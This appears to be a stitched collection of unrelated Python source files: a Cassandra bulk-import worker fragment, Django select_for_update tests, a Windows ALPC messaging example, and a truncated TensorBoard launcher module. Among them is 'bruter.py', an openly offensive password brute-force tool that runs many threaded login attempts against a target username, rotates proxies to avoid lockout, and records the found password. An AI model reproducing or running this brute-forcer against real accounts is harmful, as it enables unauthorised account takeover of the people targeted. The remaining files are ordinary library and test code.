if batch['attempts'] < failing_batch['failures']:
statement = SimpleStatement("INSERT INTO badtable (a, b) VALUES (1, 2)",
consistency_level=self.consistency_level)
return statement, True # use this statement, which will cause an error
if 'exit_batch' in self.test_failures:
exit_batch = self.test_failures['exit_batch']
if exit_batch['id'] == batch['id']:
sys.exit(1)
if 'unsent_batch' in self.test_failures:
unsent_batch = self.test_failures['unsent_batch']
if unsent_batch['id'] == batch['id']:
return None, True # do not send this batch, which will cause missing acks in the parent process
return None, False # carry on as normal, do not apply any failures
@staticmethod
def make_batch(batch_id, rows, attempts=1):
return {'id': batch_id, 'rows': rows, 'attempts': attempts}
def split_into_batches(self, chunk, conv, tm):
"""
Batch rows by ring position or replica.
If there are at least min_batch_size rows for a ring position then split these rows into
groups of max_batch_size and send a batch for each group, using all replicas for this ring position.
Otherwise, we are forced to batch by replica, and here unfortunately we can only choose one replica to
guarantee common replicas across partition keys. We are typically able
to batch by ring position for small clusters or when VNODES are not used. For large clusters with VNODES
it may not be possible, in this case it helps to increase the CHUNK SIZE but up to a limit, otherwise
we may choke the cluster.
"""
rows_by_ring_pos = defaultdict(list)
errors = defaultdict(list)
min_batch_size = self.min_batch_size
max_batch_size = self.max_batch_size
ring = tm.ring
get_row_partition_key_values = conv.get_row_partition_key_values_fcn()
pk_to_token_value = tm.pk_to_token_value
get_ring_pos = tm.get_ring_pos
make_batch = self.make_batch
for row in chunk['rows']:
try:
pk = get_row_partition_key_values(row)
rows_by_ring_pos[get_ring_pos(ring, pk_to_token_value(pk))].append(row)
except Exception, e:
errors[e.message].append(row)
if errors:
for msg, rows in errors.iteritems():
self.report_error(ParseError(msg), chunk, rows)
replicas = tm.replicas
filter_replicas = tm.filter_replicas
rows_by_replica = defaultdict(list)
for ring_pos, rows in rows_by_ring_pos.iteritems():
if len(rows) > min_batch_size:
for i in xrange(0, len(rows), max_batch_size):
yield filter_replicas(replicas[ring_pos]), make_batch(chunk['id'], rows[i:i + max_batch_size])
else:
# select only the first valid replica to guarantee more overlap or none at all
rows_by_replica[filter_replicas(replicas[ring_pos])[:1]].extend(rows)
# Now send the batches by replica
for replicas, rows in rows_by_replica.iteritems():
for i in xrange(0, len(rows), max_batch_size):
yield replicas, make_batch(chunk['id'], rows[i:i + max_batch_size])
def result_callback(self, _, batch, chunk):
self.update_chunk(batch['rows'], chunk)
def err_callback(self, response, batch, chunk, replicas):
if isinstance(response, OperationTimedOut) and chunk['imported'] == chunk['num_rows_sent']:
return # occasionally the driver sends false timeouts for rows already processed (PYTHON-652)
err_is_final = batch['attempts'] >= self.max_attempts
self.report_error(response, chunk, batch['rows'], batch['attempts'], err_is_final)
if not err_is_final:
batch['attempts'] += 1
statement = self.make_statement(self.query, self.conv, chunk, batch, replicas)
future = self.session.execute_async(statement)
future.add_callbacks(callback=self.result_callback, callback_args=(batch, chunk),
errback=self.err_callback, errback_args=(batch, chunk, replicas))
def report_error(self, err, chunk=None, rows=None, attempts=1, final=True):
if self.debug and sys.exc_info()[1] == err:
traceback.print_exc()
self.outmsg.send(ImportTaskError(err.__class__.__name__, err.message, rows, attempts, final))
if final and chunk is not None:
self.update_chunk(rows, chunk)
def update_chunk(self, rows, chunk):
chunk['imported'] += len(rows)
if chunk['imported'] == chunk['num_rows_sent']:
self.outmsg.send(ImportProcessResult(chunk['num_rows_sent']))
class RateMeter(object):
def __init__(self, log_fcn, update_interval=0.25, log_file=''):
self.log_fcn = log_fcn # the function for logging, may be None to disable logging
self.update_interval = update_interval # how often we update in seconds
self.log_file = log_file # an optional file where to log statistics in addition to stdout
self.start_time = time.time() # the start time
self.last_checkpoint_time = self.start_time # last time we logged
self.current_rate = 0.0 # rows per second
self.current_record = 0 # number of records since we last updated
self.total_records = 0 # total number of records
if os.path.isfile(self.log_file):
os.unlink(self.log_file)
def increment(self, n=1):
self.current_record += n
self.maybe_update()
def maybe_update(self, sleep=False):
if self.current_record == 0:
return
new_checkpoint_time = time.time()
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= self.update_interval:
self.update(new_checkpoint_time)
self.log_message()
elif sleep:
remaining_time = time_difference - self.update_interval
if remaining_time > 0.000001:
time.sleep(remaining_time)
def update(self, new_checkpoint_time):
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= 1e-09:
self.current_rate = self.get_new_rate(self.current_record / time_difference)
self.last_checkpoint_time = new_checkpoint_time
self.total_records += self.current_record
self.current_record = 0
def get_new_rate(self, new_rate):
"""
return the rate of the last period: this is the new rate but
averaged with the last rate to smooth a bit
"""
if self.current_rate == 0.0:
return new_rate
else:
return (self.current_rate + new_rate) / 2.0
def get_avg_rate(self):
"""
return the average rate since we started measuring
"""
time_difference = time.time() - self.start_time
return self.total_records / time_difference if time_difference >= 1e-09 else 0
def log_message(self):
if not self.log_fcn:
return
output = 'Processed: %d rows; Rate: %7.0f rows/s; Avg. rate: %7.0f rows/s\r' % \
(self.total_records, self.current_rate, self.get_avg_rate())
self.log_fcn(output, eol='\r')
if self.log_file:
with open(self.log_file, "a") as f:
f.write(output + '\n')
def get_total_records(self):
self.update(time.time())
self.log_message()
return self.total_records
|
bruter.py | # Date: 14/02/2020
# Author: SKAR
# Description: Bruter
from time import time, sleep
from lib.browser import Browser
from lib.display import Display
from threading import Thread, RLock
from lib.proxy_manager import ProxyManager
from lib.password_manager import PasswordManager
from lib.const import max_time_to_wait, max_bots_per_proxy
class Bruter(object):
def __init__(self, username, threads, passlist_path):
self.browsers = []
self.lock = RLock()
self.password = None
self.is_alive = True
self.is_found = False
self.bots_per_proxy = 0
self.username = username
self.last_password = None
self.active_passwords = []
self.proxy_manager = ProxyManager()
self.display = Display(username, passlist_path)
self.password_manager = PasswordManager(username,
passlist_path, threads, self.display)
def manage_session(self):
if self.password_manager.is_read:
if not self.password_manager.list_size or self.is_found:
self.password_manager.session.delete()
else:
if self.is_found:
self.password_manager.session.delete()
else:
self.password_manager.session.write(self.password_manager.attempts,
self.password_manager.passlist)
def browser_manager(self):
while self.is_alive:
for browser in self.browsers:
if not self.is_alive:
break
if Display.account_exists == None and Browser.account_exists != None:
Display.account_exists = Browser.account_exists
if not browser.is_active:
password = browser.password
if browser.is_attempted and not browser.is_locked:
if browser.is_found and not self.is_found:
self.password = password
self.is_found = True
with self.lock:
self.password_manager.list_remove(password)
else:
with self.lock:
self.proxy_manager.bad_proxy(browser.proxy)
self.remove_browser(browser)
else:
if browser.start_time:
if time() - browser.start_time >= max_time_to_wait:
browser.close()
def remove_browser(self, browser):
if browser in self.browsers:
with self.lock:
self.browsers.pop(self.browsers.index(browser))
self.active_passwords.pop(
self.active_passwords.index(browser.password)
)
def attack(self):
proxy = None
is_attack_started = False
while self.is_alive:
browsers = []
for password in self.password_manager.passlist:
if not self.is_alive:
break
if not proxy:
proxy = self.proxy_manager.get_proxy()
self.bots_per_proxy = 0
if self.bots_per_proxy >= max_bots_per_proxy:
proxy = None
if not proxy:
continue
if not password in self.active_passwords and password in self.password_manager.passlist:
browser = Browser(self.username, password, proxy)
browsers.append(browser)
self.bots_per_proxy += 1
if not is_attack_started:
self.display.info('Starting attack ...')
is_attack_started = True
with self.lock:
self.browsers.append(browser)
self.active_passwords.append(password)
for browser in browsers:
thread = Thread(target=browser.attempt)
thread.daemon = True
try:
thread.start()
except:
self.remove_browser(browser)
def start_daemon_threads(self):
attack = Thread(target=self.attack)
browser_manager = Thread(target=self.browser_manager)
proxy_manager = Thread(target=self.proxy_manager.start)
password_manager = Thread(target=self.password_manager.start)
attack.daemon = True
proxy_manager.daemon = True
browser_manager.daemon = True
password_manager.daemon = True
attack.start()
proxy_manager.start()
browser_manager.start()
password_manager.start()
self.display.info('Searching for proxies ...')
def stop_daemon_threads(self):
self.proxy_manager.stop()
self.password_manager.stop()
def start(self):
self.display.info('Initiating daemon threads ...')
self.start_daemon_threads()
last_attempt = 0
while self.is_alive and not self.is_found:
if last_attempt == self.password_manager.attempts and self.password_manager.attempts:
sleep(1.5)
continue
for browser in self.browsers:
self.display.stats(
browser.password, self.password_manager.attempts, len(self.browsers))
last_attempt = self.password_manager.attempts
self.last_password = browser.password
if not self.is_alive or self.is_found:
break
if self.password_manager.is_read and not self.password_manager.list_size and not len(self.browsers):
self.is_alive = False
def stop(self):
self.is_alive = False
self.manage_session()
self.stop_daemon_threads()
self.password_manager.session.is_busy = False
|
tests.py | import threading
import time
from unittest import mock
from multiple_database.routers import TestRouter
from django.core.exceptions import FieldError
from django.db import (
DatabaseError, NotSupportedError, connection, connections, router,
transaction,
)
from django.test import (
TransactionTestCase, override_settings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.utils import CaptureQueriesContext
from .models import City, Country, Person, PersonProfile
class SelectForUpdateTests(TransactionTestCase):
available_apps = ['select_for_update']
def setUp(self):
# This is executed in autocommit mode so that code in
# run_select_for_update can see this data.
self.country1 = Country.objects.create(name='Belgium')
self.country2 = Country.objects.create(name='France')
self.city1 = City.objects.create(name='Liberchies', country=self.country1)
self.city2 = City.objects.create(name='Samois-sur-Seine', country=self.country2)
self.person = Person.objects.create(name='Reinhardt', born=self.city1, died=self.city2)
self.person_profile = PersonProfile.objects.create(person=self.person)
# We need another database connection in transaction to test that one
# connection issuing a SELECT ... FOR UPDATE will block.
self.new_connection = connection.copy()
def tearDown(self):
try:
self.end_blocking_transaction()
except (DatabaseError, AttributeError):
pass
self.new_connection.close()
def start_blocking_transaction(self):
self.new_connection.set_autocommit(False)
# Start a blocking transaction. At some point,
# end_blocking_transaction() should be called.
self.cursor = self.new_connection.cursor()
sql = 'SELECT * FROM %(db_table)s %(for_update)s;' % {
'db_table': Person._meta.db_table,
'for_update': self.new_connection.ops.for_update_sql(),
}
self.cursor.execute(sql, ())
self.cursor.fetchone()
def end_blocking_transaction(self):
# Roll back the blocking transaction.
self.cursor.close()
self.new_connection.rollback()
self.new_connection.set_autocommit(True)
def has_for_update_sql(self, queries, **kwargs):
# Examine the SQL that was executed to determine whether it
# contains the 'SELECT..FOR UPDATE' stanza.
for_update_sql = connection.ops.for_update_sql(**kwargs)
return any(for_update_sql in query['sql'] for query in queries)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_sql_generated(self):
"""
The backend's FOR UPDATE variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update())
self.assertTrue(self.has_for_update_sql(ctx.captured_queries))
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_for_update_sql_generated_nowait(self):
"""
The backend's FOR UPDATE NOWAIT variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(nowait=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, nowait=True))
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_for_update_sql_generated_skip_locked(self):
"""
The backend's FOR UPDATE SKIP LOCKED variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(skip_locked=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, skip_locked=True))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_generated_of(self):
"""
The backend's FOR UPDATE OF variant appears in the generated SQL when
select_for_update() is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.select_related(
'born__country',
).select_for_update(
of=('born__country',),
).select_for_update(
of=('self', 'born__country')
))
features = connections['default'].features
if features.select_for_update_of_column:
expected = ['"select_for_update_person"."id"', '"select_for_update_country"."id"']
else:
expected = ['"select_for_update_person"', '"select_for_update_country"']
if features.uppercases_column_names:
expected = [value.upper() for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values('pk'))
self.assertEqual(values, [{'pk': self.person.pk}])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values_list(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values_list('pk'))
self.assertEqual(values, [(self.person.pk,)])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_self_when_self_is_not_selected(self):
"""
select_for_update(of=['self']) when the only columns selected are from
related tables.
"""
with transaction.atomic():
values = list(Person.objects.select_related('born').select_for_update(of=('self',)).values('born__name'))
self.assertEqual(values, [{'born__name': self.city1.name}])
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_nowait_raises_error_on_block(self):
"""
If nowait is specified, we expect an error to be raised rather
than blocking.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'nowait': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_skip_locked_skips_locked_rows(self):
"""
If skip_locked is specified, the locked row is skipped resulting in
Person.DoesNotExist.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'skip_locked': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], Person.DoesNotExist)
@skipIfDBFeature('has_select_for_update_nowait')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_nowait_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE NOWAIT is run on
a database backend that supports FOR UPDATE but not NOWAIT.
"""
with self.assertRaisesMessage(NotSupportedError, 'NOWAIT is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(nowait=True).get()
@skipIfDBFeature('has_select_for_update_skip_locked')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_skip_locked_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE SKIP LOCKED is run
on a database backend that supports FOR UPDATE but not SKIP LOCKED.
"""
with self.assertRaisesMessage(NotSupportedError, 'SKIP LOCKED is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(skip_locked=True).get()
@skipIfDBFeature('has_select_for_update_of')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_of_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE OF... is run on
a database backend that supports FOR UPDATE but not OF.
"""
msg = 'FOR UPDATE OF is not supported on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
Person.objects.select_for_update(of=('self',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_unrelated_of_argument_raises_error(self):
"""
FieldError is raised if a non-relation field is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, born__country.'
)
invalid_of = [
('nonexistent',),
('name',),
('born__nonexistent',),
('born__name',),
('born__nonexistent', 'born__name'),
]
for of in invalid_of:
with self.subTest(of=of):
with self.assertRaisesMessage(FieldError, msg % ', '.join(of)):
with transaction.atomic():
Person.objects.select_related('born__country').select_for_update(of=of).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_related_but_unselected_of_argument_raises_error(self):
"""
FieldError is raised if a relation field that is not followed in the
query is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, profile.'
)
for name in ['born__country', 'died', 'died__country']:
with self.subTest(name=name):
with self.assertRaisesMessage(FieldError, msg % name):
with transaction.atomic():
Person.objects.select_related(
'born', 'profile',
).exclude(profile=None).select_for_update(of=(name,)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_reverse_one_to_one_of_arguments(self):
"""
Reverse OneToOneFields may be included in of=(...) as long as NULLs
are excluded because LEFT JOIN isn't allowed in SELECT FOR UPDATE.
"""
with transaction.atomic():
person = Person.objects.select_related(
'profile',
).exclude(profile=None).select_for_update(of=('profile',)).get()
self.assertEqual(person.profile, self.person_profile)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_after_from(self):
features_class = connections['default'].features.__class__
attribute_to_patch = "%s.%s.for_update_after_from" % (features_class.__module__, features_class.__name__)
with mock.patch(attribute_to_patch, return_value=True):
with transaction.atomic():
self.assertIn('FOR UPDATE WHERE', str(Person.objects.filter(name='foo').select_for_update().query))
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction(self):
"""
A TransactionManagementError is raised
when a select_for_update query is executed outside of a transaction.
"""
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(Person.objects.all().select_for_update())
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction_only_in_execution(self):
"""
No TransactionManagementError is raised
when select_for_update is invoked outside of a transaction -
only when the query is executed.
"""
people = Person.objects.all().select_for_update()
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(people)
@skipUnlessDBFeature('supports_select_for_update_with_limit')
def test_select_for_update_with_limit(self):
other = Person.objects.create(name='Grappeli', born=self.city1, died=self.city2)
with transaction.atomic():
qs = list(Person.objects.all().order_by('pk').select_for_update()[1:2])
self.assertEqual(qs[0], other)
@skipIfDBFeature('supports_select_for_update_with_limit')
def test_unsupported_select_for_update_with_limit(self):
msg = 'LIMIT/OFFSET is not supported with select_for_update on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
list(Person.objects.all().order_by('pk').select_for_update()[1:2])
def run_select_for_update(self, status, **kwargs):
"""
Utility method that runs a SELECT FOR UPDATE against all
Person instances. After the select_for_update, it attempts
to update the name of the only record, save, and commit.
This function expects to run in a separate thread.
"""
status.append('started')
try:
# We need to enter transaction management again, as this is done on
# per-thread basis
with transaction.atomic():
person = Person.objects.select_for_update(**kwargs).get()
person.name = 'Fred'
person.save()
except (DatabaseError, Person.DoesNotExist) as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
connection.close()
@skipUnlessDBFeature('has_select_for_update')
@skipUnlessDBFeature('supports_transactions')
def test_block(self):
"""
A thread running a select_for_update that accesses rows being touched
by a similar operation on another connection blocks correctly.
"""
# First, let's start the transaction in our thread.
self.start_blocking_transaction()
# Now, try it again using the ORM's select_for_update
# facility. Do this in a separate thread.
status = []
thread = threading.Thread(
target=self.run_select_for_update, args=(status,)
)
# The thread should immediately block, but we'll sleep
# for a bit to make sure.
thread.start()
sanity_count = 0
while len(status) != 1 and sanity_count < 10:
sanity_count += 1
time.sleep(1)
if sanity_count >= 10:
raise ValueError('Thread did not run and block')
# Check the person hasn't been updated. Since this isn't
# using FOR UPDATE, it won't block.
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Reinhardt', p.name)
# When we end our blocking transaction, our thread should
# be able to continue.
self.end_blocking_transaction()
thread.join(5.0)
# Check the thread has finished. Assuming it has, we should
# find that it has updated the person's name.
self.assertFalse(thread.isAlive())
# We must commit the transaction to ensure that MySQL gets a fresh read,
# since by default it runs in REPEATABLE READ mode
transaction.commit()
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Fred', p.name)
@skipUnlessDBFeature('has_select_for_update')
def test_raw_lock_not_available(self):
"""
Running a raw query which can't obtain a FOR UPDATE lock raises
the correct exception
"""
self.start_blocking_transaction()
def raw(status):
try:
list(
Person.objects.raw(
'SELECT * FROM %s %s' % (
Person._meta.db_table,
connection.ops.for_update_sql(nowait=True)
)
)
)
except DatabaseError as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
# Connection cannot be closed on Oracle because cursor is still
# open.
if connection.vendor != 'oracle':
connection.close()
status = []
thread = threading.Thread(target=raw, kwargs={'status': status})
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update')
@override_settings(DATABASE_ROUTERS=[TestRouter()])
def test_select_for_update_on_multidb(self):
query = Person.objects.select_for_update()
self.assertEqual(router.db_for_write(Person), query.db)
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_with_get(self):
with transaction.atomic():
person = Person.objects.select_for_update().get(name='Reinhardt')
self.assertEqual(person.name, 'Reinhardt')
def test_nowait_and_skip_locked(self):
with self.assertRaisesMessage(ValueError, 'The nowait option cannot be used with skip_locked.'):
Person.objects.select_for_update(nowait=True, skip_locked=True)
def test_ordered_select_for_update(self):
"""
Subqueries should respect ordering as an ORDER BY clause may be useful
to specify a row locking order to prevent deadlocks (#27193).
"""
with transaction.atomic():
qs = Person.objects.filter(id__in=Person.objects.order_by('-id').select_for_update())
self.assertIn('ORDER BY', str(qs.query))
|
simple_alpc.py | import multiprocessing
import windows.alpc
from windows.generated_def import LPC_CONNECTION_REQUEST, LPC_REQUEST
PORT_NAME = r"\RPC Control\PythonForWindowsPORT"
def alpc_server():
server = windows.alpc.AlpcServer(PORT_NAME) # Create the ALPC Port
print("[SERV] PORT <{0}> CREATED".format(PORT_NAME))
msg = server.recv() # Wait for a message
print("[SERV] Message type = {0:#x}".format(msg.type))
print("[SERV] Received data: <{0}>".format(msg.data))
assert msg.type & 0xfff == LPC_CONNECTION_REQUEST # Check that message is a connection request
print("[SERV] Connection request")
server.accept_connection(msg)
msg = server.recv() # Wait for a real message
print ""
print("[SERV] Received message: <{0}>".format(msg.data))
print("[SERV] Message type = {0:#x}".format(msg.type))
assert msg.type & 0xfff == LPC_REQUEST
# We can reply by two ways:
# - Send the same message with modified data
# - Recreate a Message and copy the MessageId
msg.data = "REQUEST '{0}' DONE".format(msg.data)
server.send(msg)
def alpc_client():
print("Client pid = {0}".format(windows.current_process.pid))
# Creation an 'AlpcClient' with a port name will connect to the port with an empty message
client = windows.alpc.AlpcClient(PORT_NAME)
print("[CLIENT] Connected: {0}".format(client))
# Send a message / wait for the response
response = client.send_receive("Hello world !")
print("[CLIENT] Response: <{0}>".format(response.data))
# You can also send message without waiting for a response with 'client.send'
if __name__ == "__main__":
proc = multiprocessing.Process(target=alpc_server, args=())
proc.start()
import time; time.sleep(0.5)
alpc_client()
print("BYE")
proc.terminate() |
program.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for TensorBoard command line program.
This is a lightweight module for bringing up a TensorBoard HTTP server
or emulating the `tensorboard` shell command.
Those wishing to create custom builds of TensorBoard can use this module
by swapping out `tensorboard.main` with the custom definition that
modifies the set of plugins and static assets.
This module does not depend on first-party plugins or the default web
server assets. Those are defined in `tensorboard.default`.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from abc import ABCMeta
from abc import abstractmethod
import argparse
from collections import defaultdict
import errno
import logging
import os
import socket
import sys
import threading
import inspect
from werkzeug import serving
from tensorboard import version
from tensorboard.backend import application
from tensorboard.backend.event_processing import event_file_inspector as efi
from tensorboard.plugins import base_plugin
from tensorboard.util import util
try:
from absl import flags as absl_flags
from absl.flags import argparse_flags
except ImportError:
# Fall back to argparse with no absl flags integration.
absl_flags = None
argparse_flags = argparse
logger = logging.getLogger(__name__)
def setup_environment():
"""Makes recommended modifications to the environment.
This functions changes global state in the Python process. Calling
this function is a good idea, but it can't appropriately be called
from library routines.
"""
util.setup_logging()
# The default is HTTP/1.0 for some strange reason. If we don't use
# HTTP/1.1 then a new TCP socket and Python thread is created for
# each HTTP request. The tradeoff is we must always specify the
# Content-Length header, or do chunked encoding for streaming.
serving.WSGIRequestHandler.protocol_version = 'HTTP/1.1'
def get_default_assets_zip_provider():
"""Opens stock TensorBoard web assets collection.
Returns:
Returns function that returns a newly opened file handle to zip file
containing static assets for stock TensorBoard, or None if webfiles.zip
could not be found. The value the callback returns must be closed. The
paths inside the zip file are considered absolute paths on the web server.
"""
path = os.path.join(os.path.dirname(inspect.getfile(sys._getframe(1))),
'webfiles.zip')
if not os.path.exists(path):
logger.warning('webfiles.zip static assets not found: %s', path)
return None
return lambda: open(path, 'rb')
class TensorBoard(object):
"""Class for running TensorBoard.
Fields:
plugin_loaders: Set from plugins passed to constructor.
assets_zip_provider: Set by constructor.
server_class: Set by constructor.
flags: An argparse.Namespace set by the configure() method.
"""
def __init__(self,
plugins=None,
assets_zip_provider=None,
server_class=None):
"""Creates new instance.
Args:
plugins: A list of TensorBoard plugins to load, as TBLoader instances or
TBPlugin classes. If not specified, defaults to first-party plugins.
assets_zip_provider: Delegates to TBContext or uses default if None.
server_class: An optional subclass of TensorBoardServer to use for serving
the TensorBoard WSGI app.
:type plugins: list[Union[base_plugin.TBLoader, Type[base_plugin.TBPlugin]]]
:type assets_zip_provider: () -> file
:type server_class: class
"""
if plugins is None:
from tensorboard import default
plugins = default.get_plugins()
if assets_zip_provider is None:
assets_zip_provider = get_default_assets_zip_provider()
if server_class is None:
server_class = WerkzeugServer
def make_loader(plugin):
if isinstance(plugin, base_plugin.TBLoader):
return plugin
if issubclass(plugin, base_plugin.TBPlugin):
return base_plugin.BasicLoader(plugin)
raise ValueError("Not a TBLoader or TBPlugin subclass: %s" % plugin)
self.plugin_loaders = [make_loader(p) for p in plugins]
self.assets_zip_provider = assets_zip_provider
self.server_class = server_class
self.flags = None
def configure(self, argv=('',), **kwargs):
"""Configures TensorBoard behavior via flags.
This method will populate the "flags" property with an argparse.Namespace
representing flag values parsed from the provided argv list, overriden by
explicit flags from remaining keyword arguments.
Args:
argv: Can be set to CLI args equivalent to sys.argv; the first arg is
taken to be the name of the path being executed.
kwargs: Additional arguments will override what was parsed from
argv. They must be passed as Python data structures, e.g.
`foo=1` rather than `foo="1"`.
Returns:
Either argv[:1] if argv was non-empty, or [''] otherwise, as a mechanism
for absl.app.run() compatibility.
Raises:
ValueError: If flag values are invalid.
"""
parser = argparse_flags.ArgumentParser(
prog='tensorboard',
description=('TensorBoard is a suite of web applications for '
'inspecting and understanding your TensorFlow runs '
'and graphs. https://github.com/tensorflow/tensorboard '))
for loader in self.plugin_loaders:
loader.define_flags(parser)
arg0 = argv[0] if argv else ''
flags = parser.parse_args(argv[1:]) # Strip binary name from argv.
if absl_flags and arg0:
# Only expose main module Abseil flags as TensorBoard native flags.
# This is the same logic Abseil's ArgumentParser uses for determining
# which Abseil flags to include in the short helpstring.
for flag in set(absl_flags.FLAGS.get_key_flags_for_module(arg0)):
if hasattr(flags, flag.name):
raise ValueError('Conflicting Abseil flag: %s' % flag.name)
setattr(flags, flag.name, flag.value)
for k, v in kwargs.items():
if not hasattr(flags, k):
raise ValueError('Unknown TensorBoard flag: %s' % k)
setattr(flags, k, v)
for loader in self.plugin_loaders:
loader.fix_flags(flags)
self.flags = flags
return [arg0]
def main(self, ignored_argv=('',)):
"""Blocking main function for TensorBoard.
This method is called by `tensorboard.main.run_main`, which is the
standard entrypoint for the tensorboard command line program. The
configure() method must be called first.
Args:
ignored_argv: Do not pass. Required for Abseil compatibility.
Returns:
Process exit code, i.e. 0 if successful or non-zero on failure. In
practice, an exception will most likely be raised instead of
returning non-zero.
:rtype: int
"""
if self.flags.inspect:
logger.info('Not bringing up TensorBoard, but inspecting event files.')
event_file = os.path.expanduser(self.flags.event_file)
efi.inspect(self.flags.logdir, event_file, self.flags.tag)
return 0
try:
server = self._make_server()
sys.stderr.write('TensorBoard %s at %s (Press CTRL+C to quit)\n' %
(version.VERSION, server.get_url()))
sys.stderr.flush()
server.serve_forever()
return 0
except TensorBoardServerException as e:
logger.error(e.msg)
sys.stderr.write('ERROR: %s\n' % e.msg)
sys.stderr.flush()
return -1
def launch(self):
"""Python API for launching TensorBoard.
This method is the same as main() except it launches TensorBoard in
a separate permanent thread. The configure() method must be called
first.
Returns:
The URL of the TensorBoard web server.
:rtype: str
"""
# Make it easy to run TensorBoard inside other programs, e.g. Colab.
server = self._make_server()
thread = threading.Thread(target=server.serve_forever, name='TensorBoard')
thread.daemon = True
thread.start()
return server.get_url()
def _make_server(self):
"""Constructs the TensorBoard WSGI app and instantiates the server."""
app = application.standard_tensorboard_wsgi(self.flags,
self.plugin_loaders,
self.assets_zip_provider)
return self.server_class(app, self.flags)
class TensorBoardServer(object):
"""Class for customizing TensorBoard WSGI app serving."""
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, wsgi_app, flags):
"""Create a flag-configured HTTP server for TensorBoard's WSGI app.
Args:
wsgi_app: The TensorBoard WSGI application to create a server for.
flags: argparse.Namespace instance of TensorBoard flags.
"""
raise NotImplementedError()
@abstractmethod
def serve_forever(self):
"""Blocking call to start serving the TensorBoard server."""
raise NotImplementedError()
@abstractmethod
def get_url(self):
"""Returns a URL at which this server should be reachable."""
raise NotImplementedError()
class TensorBoardServerException(Exception):
"""Exception raised by TensorBoardServer for user-friendly errors.
Subclasses of TensorBoardServer can raise this exception in order to
generate a clean error message for the user rather than a stacktrace.
"""
def __init__(self, msg):
self.msg = msg
class WerkzeugServer(serving.ThreadedWSGIServer, TensorBoardServer):
"""Implementation of TensorBoardServer using the Werkzeug dev server."""
# ThreadedWSGIServer handles this in werkzeug 0.12+ but we allow 0.11.x.
daemon_threads = True
def __init__(self, wsgi_app, flags):
self._flags = flags
host = flags.host
self._auto_wildcard = False
